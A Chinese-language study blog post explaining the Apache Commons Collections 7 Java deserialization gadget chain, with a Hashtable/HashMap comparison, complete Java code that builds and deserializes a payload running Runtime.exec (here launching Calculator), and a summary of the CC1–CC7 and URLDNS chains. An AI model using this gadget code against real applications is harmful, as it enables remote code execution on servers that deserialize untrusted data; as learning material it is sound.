根据之前的学习,发现看cc7应该很简单了。(环境:JDK8u311)
cc6使用了HashMap和HashSet,cc7使用的是Hashtable
Hashtable 与 HashMap 十分相似,是一种 key-value 形式的哈希表,但仍然存在一些区别:
-
HashMap 继承 AbstractMap,而 Hashtable 继承 Dictionary ,可以说是一个过时的类。
-
两者内部基本都是使用“数组-链表”的结构,但是 HashMap 引入了红黑树的实现。
-
Hashtable 的 key-value 不允许为 null 值,但是 HashMap 则是允许的,后者会将 key=null 的实体放在 index=0 的位置。
-
Hashtable 线程安全,HashMap 线程不安全。
那么我们可以进入这个类看一下它的readObject方法,在最后有个reconstitutionPut方法
进入这个方法,发现其中会使用key调用hashCode方法,那么可以按照cc6中的TideMapEntry方法进行利用
实现代码
import java.util.Hashtable;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;
public class cc7 {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
Hashtable<Object, Object> hashtable = new Hashtable<>();
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator.app"})
};
ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{});
Map lazyMap = LazyMap.decorate(new HashMap(), fakeChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "zyer");
hashtable.put(entry, "zyer");
Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
f.setAccessible(true);
f.set(fakeChain, transformers);
lazyMap.clear();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));
objectOutputStream.writeObject(hashtable);
objectOutputStream.close();
ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));
objectInputStream.readObject();
}
}
学习到这,也算java入个小门了,以后继续分析其它的链子。参考su18师傅对这八个攻击链做一个总结
以下红色为入口点(kick-off),紫色为触发点(sink),其余为中间的调用链(chain)
-
URLDNS :HashMap + URL
-
Commons Collections 1 :AnnotationInvocationHandler + LazyMap/TransformedMap + Transformer
-
Commons Collections 2 :PriorityQueue + TransformingComparator + Transformer/TemplatesImpl
-
Commons Collections 3 :AnnotationInvocationHandler + LazyMap + Transformer + TrAXFilter + TemplatesImpl
-
Commons Collections 4 :PriorityQueue/TreeBag + TransformingComparator + Transformer + TrAXFilter + TemplatesImpl
-
Commons Collections 5 :BadAttributeValueExpException + TiedMapEntry + LazyMap + Transformer
-
Commons Collections 6 :HashMap/HashSet + TiedMapEntry + LazyMap + Transformer
-
Commons Collections 7 :Hashtable + TiedMapEntry + LazyMap + Transformer
近期会学习CTF web以及其它利用链,并分析shiro,weblogic,fastjson进行实战利用,